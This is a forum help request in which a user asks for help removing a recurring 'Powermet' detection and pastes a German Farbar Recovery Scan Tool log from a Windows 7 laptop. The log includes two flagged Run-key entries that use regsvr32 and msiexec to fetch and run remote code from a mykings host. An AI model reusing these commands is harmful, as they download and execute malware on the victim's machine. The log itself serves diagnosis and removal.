Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Virus on my PC "Behavior:Win32/Powermet.B!attk"


  • This topic is locked This topic is locked
26 replies to this topic

#1 Schub

Schub

  • Members
  • 14 posts
  • OFFLINE
  •  
  • Local time:01:06 PM

Posted 25 August 2017 - 09:47 AM

Hello,
 

I found a virus on my Windows 7, SP1 Notebook called Behavior:Win32/Powermet.B!attk.
My Microsoft Security Essential(Antivirus Defenision. 1.251.32.0) isn’t able to
delete it permanent. It went to quarantine. I can delete it, for the moment, but
after every start the virus comes back.

Please help

 

Sorry, the logs are in german :orange:

 

Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 20-08-2017
durchgeführt von a_omuell (Administrator) auf SANDBURG9 (24-08-2017 19:51:39)
Gestartet von C:\Users\a_omuell\Desktop
Geladene Profile: a_omuell (Verfügbare Profile: a_omuell)
Platform: Windows 7 Home Premium Service Pack 1 (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser nicht gefunden!)
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Dritek System Inc.) C:\Program Files (x86)\Launch Manager\dsiwmis.exe
(Acer Incorporated) C:\Program Files\Acer\Acer PowerSmart Manager\ePowerSvc.exe
(Acer Incorporated) C:\Program Files (x86)\Acer\Registration\GREGsvc.exe
(NewTech Infosystems, Inc.) C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe
(NTI, Inc.) C:\Program Files (x86)\NewTech Infosystems\NTI Backup Now 5\SchedulerSvc.exe
() C:\Program Files (x86)\Cyberlink\Shared files\RichVideo.exe
(Acer Group) C:\Program Files\Acer\Acer Updater\UpdaterService.exe
(VMware, Inc.) C:\Windows\SysWOW64\vmnat.exe
(VMware, Inc.) C:\Program Files (x86)\VMware\VMware Player\vmware-authd.exe
(VMware, Inc.) C:\Windows\SysWOW64\vmnetdhcp.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Alcor Micro Corp.) C:\Program Files (x86)\AmIcoSingLun\AmIcoSinglun64.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Egis Technology Inc.) C:\Program Files (x86)\EgisTec MyWinLocker\x86\mwlDaemon.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(Microsoft Corporation) C:\Program Files\Windows Sidebar\sidebar.exe
(Microsoft Corporation) C:\Windows\System32\msiexec.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Egis Technology Inc.) C:\Program Files (x86)\EgisTec IPS\PmmUpdate.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Reader 9.0\Reader\reader_sl.exe
(NewTech Infosystems, Inc.) C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe
(Dritek System Inc.) C:\Program Files (x86)\Launch Manager\LManager.exe
(CyberLink Corp.) C:\Program Files (x86)\Acer Arcade Deluxe\Arcade Movie\ArcadeMovieService.exe
(Dritek System Inc.) C:\Program Files (x86)\Launch Manager\MMDx64Fx.exe
(Dritek System Inc.) C:\Program Files (x86)\Launch Manager\LMworker.exe
(Egis Technology Inc.) C:\Program Files (x86)\EgisTec IPS\EgisUpdate.exe
(Acer Incorporated) C:\Program Files\Acer\Acer PowerSmart Manager\ePowerTray.exe
(Acer Incorporated) C:\Program Files\Acer\Acer PowerSmart Manager\ePowerEvent.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe

==================== Registry (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [10081312 2010-02-22] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [877600 2010-02-22] (Realtek Semiconductor)
HKLM\...\Run: [AmIcoSinglun64] => C:\Program Files (x86)\AmIcoSingLun\AmIcoSinglun64.exe [324608 2010-02-05] (Alcor Micro Corp.)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2107176 2010-03-11] (Synaptics Incorporated)
HKLM\...\Run: [mwlDaemon] => C:\Program Files (x86)\EgisTec MyWinLocker\x86\mwlDaemon.exe [349552 2010-05-27] (Egis Technology Inc.)
HKLM\...\Run: [Acer ePower Management] => C:\Program Files\Acer\Acer PowerSmart Manager\ePowerTrayLauncher.exe [496160 2010-06-15] (Acer Incorporated)
HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [1353680 2016-11-14] (Microsoft Corporation)
HKLM\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.mykings.top:280/v.sct scrobj.dll <==== ACHTUNG
HKLM\...\Run: [start1] => msiexec.exe /i hxxp://js.mykings.top:280/helloworld.msi /q <==== ACHTUNG
HKLM-x32\...\Run: [SuiteTray] => C:\Program Files (x86)\EgisTec MyWinLockerSuite\x86\SuiteTray.exe [337264 2010-05-27] (Egis Technology Inc.)
HKLM-x32\...\Run: [EgisUpdate] => C:\Program Files (x86)\EgisTec IPS\EgisUpdate.exe [201584 2010-03-11] (Egis Technology Inc.)
HKLM-x32\...\Run: [EgisTecPMMUpdate] => C:\Program Files (x86)\EgisTec IPS\PmmUpdate.exe [407920 2010-03-11] (Egis Technology Inc.)
HKLM-x32\...\Run: [Adobe Reader Speed Launcher] => C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Reader_sl.exe [41056 2013-05-08] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [BackupManagerTray] => C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe [265984 2010-06-29] (NewTech Infosystems, Inc.)
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [98304 2010-06-06] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [LManager] => C:\Program Files (x86)\Launch Manager\LManager.exe [975952 2010-08-10] (Dritek System Inc.)
HKLM-x32\...\Run: [MDS_Menu] => C:\Program Files (x86)\Acer Arcade Deluxe\MediaShow Espresso\MUITransfer\MUIStartMenu.exe [222504 2009-05-19] (CyberLink Corp.)
HKLM-x32\...\Run: [ArcadeMovieService] => C:\Program Files (x86)\Acer Arcade Deluxe\Arcade Movie\ArcadeMovieService.exe [124136 2010-06-25] (CyberLink Corp.)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [958576 2013-04-04] (Adobe Systems Incorporated)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-4004736709-471984187-2621406794-1000\...\MountPoints2: {9f7dd17e-1f37-11e0-a697-18f46a00430f} - D:\LaunchU3.exe -a
HKU\S-1-5-18\...\RunOnce: [SPReview] => C:\Windows\System32\SPReview\SPReview.exe [301568 2014-12-16] (Microsoft Corporation)

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{b931e1cb-efbb-4b73-a96f-f6f05641dedb} <==== ACHTUNG (Beschränkung - IP)
Tcpip\Parameters: [DhcpNameServer] 83.169.186.161 83.169.186.225
Tcpip\..\Interfaces\{E77964F0-289D-4C1C-A250-5D0B67FAD4F3}: [DhcpNameServer] 83.169.186.161 83.169.186.225

Internet Explorer:
==================
HKU\S-1-5-21-4004736709-471984187-2621406794-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://google.de/
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?q={searchTerms}&form=AARTDF&pc=MAAR&src=IE-SearchBox
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?q={searchTerms}&form=AARTDF&pc=MAAR&src=IE-SearchBox
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?q={searchTerms}&form=AARTDF&pc=MAAR&src=IE-SearchBox
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?q={searchTerms}&form=AARTDF&pc=MAAR&src=IE-SearchBox
SearchScopes: HKU\S-1-5-21-4004736709-471984187-2621406794-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-4004736709-471984187-2621406794-1000 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
BHO: SnagIt Toolbar Loader -> {00C6482D-C502-44C8-8409-FCE54AD9C208} -> C:\Program Files (x86)\TechSmith\Snagit 9\DLLx64\SnagitBHO64.dll [2008-11-06] (TechSmith Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO-x32: SnagIt Toolbar Loader -> {00C6482D-C502-44C8-8409-FCE54AD9C208} -> C:\Program Files (x86)\TechSmith\Snagit 9\SnagitBHO.dll [2008-11-06] (TechSmith Corporation)
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2013-05-08] (Adobe Systems Incorporated)
BHO-x32: Kein Name -> {5C255C8A-E604-49b4-9D64-90988571CECB} -> Keine Datei
BHO-x32: Windows Live Anmelde-Hilfsprogramm -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-01-22] (Microsoft Corporation)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
Toolbar: HKLM-x32 - Snagit - {8FF5E183-ABDE-46EB-B09E-D2AAB95CABE3} - C:\Program Files (x86)\TechSmith\Snagit 9\SnagitIEAddin.dll [2008-11-06] (TechSmith Corporation)
Toolbar: HKU\S-1-5-21-4004736709-471984187-2621406794-1000 -> Kein Name - {8FF5E180-ABDE-46EB-B09E-D2AAB95CABE3} -  Keine Datei
Handler-x32: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8117.0416.dll [2010-04-16] (Microsoft Corporation)
Handler-x32: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8117.0416.dll [2010-04-16] (Microsoft Corporation)

FireFox:
========
FF ProfilePath: C:\Users\a_omuell\AppData\Roaming\Mozilla\Firefox\Profiles\lpv20eh8.default [2017-08-24]
FF Homepage: Mozilla\Firefox\Profiles\lpv20eh8.default -> hxxp://www.google.de/
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~3\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=14.0.8117.0416 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2010-04-17] (Microsoft Corporation)
FF Plugin-x32: @videolan.org/vlc,version=2.2.2 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-01-21] (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AIR\nppdf32.dll [2013-05-08] (Adobe Systems Inc.)

==================== Dienste (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 ePowerSvc; C:\Program Files\Acer\Acer PowerSmart Manager\ePowerSvc.exe [822304 2010-06-15] (Acer Incorporated)
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [119864 2016-11-14] (Microsoft Corporation)
S3 MWLService; C:\Program Files (x86)\EgisTec MyWinLocker\x86\MWLService.exe [305520 2010-05-27] (Egis Technology Inc.)
R3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [361816 2016-11-14] (Microsoft Corporation)
R2 NTISchedulerSvc; C:\Program Files (x86)\NewTech Infosystems\NTI Backup Now 5\SchedulerSvc.exe [144640 2010-04-17] (NTI, Inc.)
R2 RichVideo; C:\Program Files (x86)\Cyberlink\Shared files\RichVideo.exe [244904 2010-02-03] () [Datei ist nicht signiert]
R2 VMAuthdService; C:\Program Files (x86)\VMware\VMware Player\vmware-authd.exe [79872 2012-11-01] (VMware, Inc.) [Datei ist nicht signiert]
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)
S2 syshost32; "C:\Windows\Installer\{6C72F8FA-6B0E-2807-8D3A-77486CA33D34}\syshost.exe" /service [X]

===================== Treiber (Nicht auf der Ausnahmeliste) ======================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [295000 2016-08-25] (Microsoft Corporation)
R3 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [135928 2016-08-25] (Microsoft Corporation)
R2 TurboB; C:\Windows\System32\DRIVERS\TurboB.sys [13784 2009-11-02] ()
R0 vsock; C:\Windows\System32\drivers\vsock.sys [70296 2012-10-24] (VMware, Inc.)

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

==================== Ein Monat: Erstellte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2017-08-24 19:51 - 2017-08-24 19:53 - 000013595 _____ C:\Users\a_omuell\Desktop\FRST.txt
2017-08-24 17:19 - 2017-08-24 17:28 - 000000000 ____D C:\Backup_FF
2017-08-09 17:32 - 2017-07-29 16:56 - 000117248 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tdx.sys
2017-08-09 17:32 - 2017-07-21 16:26 - 000518144 _____ C:\Windows\SysWOW64\msjetoledb40.dll
2017-08-09 17:32 - 2017-07-21 16:26 - 000409600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msexch40.dll
2017-08-09 17:32 - 2017-07-21 16:26 - 000290816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msjtes40.dll
2017-08-09 17:32 - 2017-07-21 16:26 - 000282624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstext40.dll
2017-08-09 17:32 - 2017-07-15 20:35 - 000394448 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2017-08-09 17:32 - 2017-07-15 19:52 - 000346320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2017-08-09 17:32 - 2017-07-14 17:29 - 002319872 _____ (Microsoft Corporation) C:\Windows\system32\tquery.dll
2017-08-09 17:32 - 2017-07-14 17:29 - 002222080 _____ (Microsoft Corporation) C:\Windows\system32\mssrch.dll
2017-08-09 17:32 - 2017-07-14 17:29 - 002058240 _____ (Microsoft Corporation) C:\Windows\system32\Query.dll
2017-08-09 17:32 - 2017-07-14 17:29 - 000778240 _____ (Microsoft Corporation) C:\Windows\system32\mssvp.dll
2017-08-09 17:32 - 2017-07-14 17:29 - 000491520 _____ (Microsoft Corporation) C:\Windows\system32\mssph.dll
2017-08-09 17:32 - 2017-07-14 17:29 - 000486400 _____ (Microsoft Corporation) C:\Windows\system32\wer.dll
2017-08-09 17:32 - 2017-07-14 17:29 - 000288256 _____ (Microsoft Corporation) C:\Windows\system32\mssphtb.dll
2017-08-09 17:32 - 2017-07-14 17:29 - 000115200 _____ (Microsoft Corporation) C:\Windows\system32\mssitlb.dll
2017-08-09 17:32 - 2017-07-14 17:29 - 000099840 _____ (Microsoft Corporation) C:\Windows\system32\mssprxy.dll
2017-08-09 17:32 - 2017-07-14 17:29 - 000075264 _____ (Microsoft Corporation) C:\Windows\system32\msscntrs.dll
2017-08-09 17:32 - 2017-07-14 17:29 - 000034304 _____ (Microsoft Corporation) C:\Windows\system32\werdiagcontroller.dll
2017-08-09 17:32 - 2017-07-14 17:29 - 000014336 _____ (Microsoft Corporation) C:\Windows\system32\msshooks.dll
2017-08-09 17:32 - 2017-07-14 17:12 - 000591872 _____ (Microsoft Corporation) C:\Windows\system32\SearchIndexer.exe
2017-08-09 17:32 - 2017-07-14 17:12 - 000249856 _____ (Microsoft Corporation) C:\Windows\system32\SearchProtocolHost.exe
2017-08-09 17:32 - 2017-07-14 17:11 - 000113664 _____ (Microsoft Corporation) C:\Windows\system32\SearchFilterHost.exe
2017-08-09 17:32 - 2017-07-14 17:10 - 001549824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tquery.dll
2017-08-09 17:32 - 2017-07-14 17:10 - 001400320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssrch.dll
2017-08-09 17:32 - 2017-07-14 17:10 - 001363968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Query.dll
2017-08-09 17:32 - 2017-07-14 17:10 - 000666624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssvp.dll
2017-08-09 17:32 - 2017-07-14 17:10 - 000382976 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wer.dll
2017-08-09 17:32 - 2017-07-14 17:10 - 000337408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssph.dll
2017-08-09 17:32 - 2017-07-14 17:10 - 000197120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssphtb.dll
2017-08-09 17:32 - 2017-07-14 17:10 - 000104448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssitlb.dll
2017-08-09 17:32 - 2017-07-14 17:10 - 000059392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msscntrs.dll
2017-08-09 17:32 - 2017-07-14 17:10 - 000034816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssprxy.dll
2017-08-09 17:32 - 2017-07-14 17:00 - 000427520 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SearchIndexer.exe
2017-08-09 17:32 - 2017-07-14 17:00 - 000164352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SearchProtocolHost.exe
2017-08-09 17:32 - 2017-07-14 16:59 - 000086528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SearchFilterHost.exe
2017-08-09 17:32 - 2017-07-14 16:59 - 000009728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msshooks.dll
2017-08-09 17:32 - 2017-07-14 16:57 - 000050688 _____ (Microsoft Corporation) C:\Windows\system32\wermgr.exe
2017-08-09 17:32 - 2017-07-14 16:50 - 000054272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wermgr.exe
2017-08-09 17:32 - 2017-07-14 16:50 - 000028672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\werdiagcontroller.dll
2017-08-09 17:32 - 2017-07-14 09:16 - 002724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2017-08-09 17:32 - 2017-07-14 09:15 - 000004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2017-08-09 17:32 - 2017-07-14 08:49 - 025733632 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2017-08-09 17:32 - 2017-07-14 08:47 - 000066560 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2017-08-09 17:32 - 2017-07-14 08:45 - 000417792 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2017-08-09 17:32 - 2017-07-14 08:45 - 000048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2017-08-09 17:32 - 2017-07-14 08:44 - 000576512 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2017-08-09 17:32 - 2017-07-14 08:44 - 000088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2017-08-09 17:32 - 2017-07-14 08:38 - 002899456 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2017-08-09 17:32 - 2017-07-14 08:29 - 000054784 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2017-08-09 17:32 - 2017-07-14 08:28 - 000034304 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2017-08-09 17:32 - 2017-07-14 08:22 - 000615936 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2017-08-09 17:32 - 2017-07-14 08:20 - 000144384 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2017-08-09 17:32 - 2017-07-14 08:20 - 000116224 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2017-08-09 17:32 - 2017-07-14 08:19 - 000817664 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2017-08-09 17:32 - 2017-07-14 08:19 - 000814080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2017-08-09 17:32 - 2017-07-14 08:08 - 000968704 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2017-08-09 17:32 - 2017-07-14 08:02 - 000489984 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2017-08-09 17:32 - 2017-07-14 07:49 - 000077824 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2017-08-09 17:32 - 2017-07-14 07:48 - 000087552 _____ (Microsoft Corporation) C:\Windows\system32\tdc.ocx
2017-08-09 17:32 - 2017-07-14 07:47 - 000107520 _____ (Microsoft Corporation) C:\Windows\system32\inseng.dll
2017-08-09 17:32 - 2017-07-14 07:42 - 000199680 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2017-08-09 17:32 - 2017-07-14 07:40 - 000092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2017-08-09 17:32 - 2017-07-14 07:35 - 005981184 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2017-08-09 17:32 - 2017-07-14 07:35 - 000315392 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2017-08-09 17:32 - 2017-07-14 07:33 - 000152064 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll
2017-08-09 17:32 - 2017-07-14 07:16 - 000262144 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2017-08-09 17:32 - 2017-07-14 07:11 - 000725504 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2017-08-09 17:32 - 2017-07-14 07:10 - 000806912 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2017-08-09 17:32 - 2017-07-14 07:09 - 002132992 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2017-08-09 17:32 - 2017-07-14 07:09 - 001359360 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2017-08-09 17:32 - 2017-07-14 06:40 - 015254016 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2017-08-09 17:32 - 2017-07-14 06:23 - 003240960 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2017-08-09 17:32 - 2017-07-14 06:07 - 001545728 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2017-08-09 17:32 - 2017-07-14 05:58 - 000800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2017-08-09 17:32 - 2017-07-14 05:01 - 002724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2017-08-09 17:32 - 2017-07-14 04:54 - 020270080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2017-08-09 17:32 - 2017-07-14 04:48 - 000499200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2017-08-09 17:32 - 2017-07-14 04:48 - 000341504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec
2017-08-09 17:32 - 2017-07-14 04:48 - 000062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2017-08-09 17:32 - 2017-07-14 04:48 - 000047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2017-08-09 17:32 - 2017-07-14 04:47 - 000064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2017-08-09 17:32 - 2017-07-14 04:44 - 002290176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2017-08-09 17:32 - 2017-07-14 04:42 - 000047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2017-08-09 17:32 - 2017-07-14 04:41 - 000030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2017-08-09 17:32 - 2017-07-14 04:39 - 000476160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2017-08-09 17:32 - 2017-07-14 04:38 - 000663552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2017-08-09 17:32 - 2017-07-14 04:38 - 000620032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2017-08-09 17:32 - 2017-07-14 04:38 - 000115712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2017-08-09 17:32 - 2017-07-14 04:30 - 000416256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2017-08-09 17:32 - 2017-07-14 04:26 - 000060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2017-08-09 17:32 - 2017-07-14 04:25 - 000091136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inseng.dll
2017-08-09 17:32 - 2017-07-14 04:25 - 000073216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tdc.ocx
2017-08-09 17:32 - 2017-07-14 04:23 - 000168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2017-08-09 17:32 - 2017-07-14 04:22 - 000076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2017-08-09 17:32 - 2017-07-14 04:21 - 000279040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2017-08-09 17:32 - 2017-07-14 04:20 - 000130048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\occache.dll
2017-08-09 17:32 - 2017-07-14 04:17 - 004546048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2017-08-09 17:32 - 2017-07-14 04:13 - 000230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll
2017-08-09 17:32 - 2017-07-14 04:12 - 000693248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2017-08-09 17:32 - 2017-07-14 04:11 - 002057216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2017-08-09 17:32 - 2017-07-14 04:11 - 001155072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2017-08-09 17:32 - 2017-07-14 04:09 - 013663744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
